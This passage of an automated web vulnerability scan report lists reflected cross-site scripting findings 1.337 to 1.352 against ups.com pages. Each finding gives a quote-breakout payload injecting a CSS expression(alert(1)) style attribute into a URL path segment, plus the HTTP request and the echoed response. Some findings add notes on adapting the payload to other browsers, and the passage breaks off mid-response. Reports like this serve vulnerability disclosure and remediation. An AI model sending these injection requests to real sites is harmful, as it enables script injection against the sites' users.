1.337. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/index.jsx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2732"style%3d"x%3aexpression(alert(1))"04a1cbd1897 was submitted in the REST URL parameter 3. This input was echoed as c2732"style="x:expression(alert(1))"04a1cbd1897 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enc2732"style%3d"x%3aexpression(alert(1))"04a1cbd1897/index.jsx HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:00 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 124319


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enc2732"style="x:expression(alert(1))"04a1cbd1897/index.jsx">
...[SNIP]...

1.338. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/alliances/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c56a"style%3d"x%3aexpression(alert(1))"c7ff244ebad was submitted in the REST URL parameter 2. This input was echoed as 8c56a"style="x:expression(alert(1))"c7ff244ebad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us8c56a"style%3d"x%3aexpression(alert(1))"c7ff244ebad/en/locations/alliances/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33734


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us8c56a"style="x:expression(alert(1))"c7ff244ebad/en/locations/alliances/index.html">
...[SNIP]...

1.339. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/alliances/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66bf6"style%3d"x%3aexpression(alert(1))"eb049b5ef2a was submitted in the REST URL parameter 3. This input was echoed as 66bf6"style="x:expression(alert(1))"eb049b5ef2a in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and is not evaluated by other browsers; the attribute breakout itself is browser-independent, so other browsers would need a different payload (for example an event-handler attribute) at the same injection point.

Request

GET /content/us/en66bf6"style%3d"x%3aexpression(alert(1))"eb049b5ef2a/locations/alliances/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33734


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en66bf6"style="x:expression(alert(1))"eb049b5ef2a/locations/alliances/index.html">
...[SNIP]...

1.340. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/aso/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a18c"style%3d"x%3aexpression(alert(1))"85469569a7f was submitted in the REST URL parameter 2. This input was echoed as 9a18c"style="x:expression(alert(1))"85469569a7f in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and is not evaluated by other browsers; the attribute breakout itself is browser-independent, so other browsers would need a different payload (for example an event-handler attribute) at the same injection point.

Request

GET /content/us9a18c"style%3d"x%3aexpression(alert(1))"85469569a7f/en/locations/aso/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:25 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36772


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us9a18c"style="x:expression(alert(1))"85469569a7f/en/locations/aso/index.html">
...[SNIP]...

1.341. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/aso/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71006"style%3d"x%3aexpression(alert(1))"fb54cd13bc5 was submitted in the REST URL parameter 3. This input was echoed as 71006"style="x:expression(alert(1))"fb54cd13bc5 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and is not evaluated by other browsers; the attribute breakout itself is browser-independent, so other browsers would need a different payload (for example an event-handler attribute) at the same injection point.

Request

GET /content/us/en71006"style%3d"x%3aexpression(alert(1))"fb54cd13bc5/locations/aso/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36772


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en71006"style="x:expression(alert(1))"fb54cd13bc5/locations/aso/index.html">
...[SNIP]...

1.342. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/custcenters/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 992bd"style%3d"x%3aexpression(alert(1))"fc1c542d606 was submitted in the REST URL parameter 2. This input was echoed as 992bd"style="x:expression(alert(1))"fc1c542d606 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and is not evaluated by other browsers; the attribute breakout itself is browser-independent, so other browsers would need a different payload (for example an event-handler attribute) at the same injection point.

Request

GET /content/us992bd"style%3d"x%3aexpression(alert(1))"fc1c542d606/en/locations/custcenters/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36791


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us992bd"style="x:expression(alert(1))"fc1c542d606/en/locations/custcenters/index.html">
...[SNIP]...

1.343. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/custcenters/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84cea"style%3d"x%3aexpression(alert(1))"fabf1550216 was submitted in the REST URL parameter 3. This input was echoed as 84cea"style="x:expression(alert(1))"fabf1550216 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and is not evaluated by other browsers; the attribute breakout itself is browser-independent, so other browsers would need a different payload (for example an event-handler attribute) at the same injection point.

Request

GET /content/us/en84cea"style%3d"x%3aexpression(alert(1))"fabf1550216/locations/custcenters/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:35 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36791


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en84cea"style="x:expression(alert(1))"fabf1550216/locations/custcenters/index.html">
...[SNIP]...

1.344. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/dropboxes/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3203e"style%3d"x%3aexpression(alert(1))"21d9c88cca3 was submitted in the REST URL parameter 2. This input was echoed as 3203e"style="x:expression(alert(1))"21d9c88cca3 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and is not evaluated by other browsers; the attribute breakout itself is browser-independent, so other browsers would need a different payload (for example an event-handler attribute) at the same injection point.

Request

GET /content/us3203e"style%3d"x%3aexpression(alert(1))"21d9c88cca3/en/locations/dropboxes/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:24 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37057


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us3203e"style="x:expression(alert(1))"21d9c88cca3/en/locations/dropboxes/index.html">
...[SNIP]...

1.345. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/dropboxes/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e791a"style%3d"x%3aexpression(alert(1))"af78a44ca5c was submitted in the REST URL parameter 3. This input was echoed as e791a"style="x:expression(alert(1))"af78a44ca5c in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and is not evaluated by other browsers; the attribute breakout itself is browser-independent, so other browsers would need a different payload (for example an event-handler attribute) at the same injection point.

Request

GET /content/us/ene791a"style%3d"x%3aexpression(alert(1))"af78a44ca5c/locations/dropboxes/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37057


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/ene791a"style="x:expression(alert(1))"af78a44ca5c/locations/dropboxes/index.html">
...[SNIP]...

1.346. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/store/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0680"style%3d"x%3aexpression(alert(1))"8203c807817 was submitted in the REST URL parameter 2. This input was echoed as f0680"style="x:expression(alert(1))"8203c807817 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and is not evaluated by other browsers; the attribute breakout itself is browser-independent, so other browsers would need a different payload (for example an event-handler attribute) at the same injection point.

Request

GET /content/usf0680"style%3d"x%3aexpression(alert(1))"8203c807817/en/locations/store/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38015


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usf0680"style="x:expression(alert(1))"8203c807817/en/locations/store/index.html">
...[SNIP]...

1.347. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/store/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7ad9"style%3d"x%3aexpression(alert(1))"f95a058444a was submitted in the REST URL parameter 3. This input was echoed as a7ad9"style="x:expression(alert(1))"f95a058444a in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and is not evaluated by other browsers; the attribute breakout itself is browser-independent, so other browsers would need a different payload (for example an event-handler attribute) at the same injection point.

Request

GET /content/us/ena7ad9"style%3d"x%3aexpression(alert(1))"f95a058444a/locations/store/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38015


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/ena7ad9"style="x:expression(alert(1))"f95a058444a/locations/store/index.html">
...[SNIP]...

1.348. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/myups/billing/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad5e0"style%3d"x%3aexpression(alert(1))"5145468c0af was submitted in the REST URL parameter 2. This input was echoed as ad5e0"style="x:expression(alert(1))"5145468c0af in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and is not evaluated by other browsers; the attribute breakout itself is browser-independent, so other browsers would need a different payload (for example an event-handler attribute) at the same injection point.

Request

GET /content/usad5e0"style%3d"x%3aexpression(alert(1))"5145468c0af/en/myups/billing/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:23 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39410


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usad5e0"style="x:expression(alert(1))"5145468c0af/en/myups/billing/index.html">
...[SNIP]...

1.349. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/myups/billing/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a57c4"style%3d"x%3aexpression(alert(1))"88004cee062 was submitted in the REST URL parameter 3. This input was echoed as a57c4"style="x:expression(alert(1))"88004cee062 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and is not evaluated by other browsers; the attribute breakout itself is browser-independent, so other browsers would need a different payload (for example an event-handler attribute) at the same injection point.

Request

GET /content/us/ena57c4"style%3d"x%3aexpression(alert(1))"88004cee062/myups/billing/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:25 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39410


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/ena57c4"style="x:expression(alert(1))"88004cee062/myups/billing/index.html">
...[SNIP]...

1.350. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/myups/mgmt/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd044"style%3d"x%3aexpression(alert(1))"8605e8dd69e was submitted in the REST URL parameter 2. This input was echoed as cd044"style="x:expression(alert(1))"8605e8dd69e in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and is not evaluated by other browsers; the attribute breakout itself is browser-independent, so other browsers would need a different payload (for example an event-handler attribute) at the same injection point.

Request

GET /content/uscd044"style%3d"x%3aexpression(alert(1))"8605e8dd69e/en/myups/mgmt/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:22 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33291


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/uscd044"style="x:expression(alert(1))"8605e8dd69e/en/myups/mgmt/index.html">
...[SNIP]...

1.351. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/myups/mgmt/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d01d3"style%3d"x%3aexpression(alert(1))"63752b625b4 was submitted in the REST URL parameter 3. This input was echoed as d01d3"style="x:expression(alert(1))"63752b625b4 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and is not evaluated by other browsers; the attribute breakout itself is browser-independent, so other browsers would need a different payload (for example an event-handler attribute) at the same injection point.

Request

GET /content/us/end01d3"style%3d"x%3aexpression(alert(1))"63752b625b4/myups/mgmt/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:24 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33291


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/end01d3"style="x:expression(alert(1))"63752b625b4/myups/mgmt/index.html">
...[SNIP]...

1.352. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/register/help/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab43b"style%3d"x%3aexpression(alert(1))"d5a4fd981ac was submitted in the REST URL parameter 2. This input was echoed as ab43b"style="x:expression(alert(1))"d5a4fd981ac in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer and is not evaluated by other browsers; the attribute breakout itself is browser-independent, so other browsers would need a different payload (for example an event-handler attribute) at the same injection point.

Request

GET /content/usab43b"style%3d"x%3aexpression(alert(1))"d5a4fd981ac/en/register/help/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:35 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32099


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
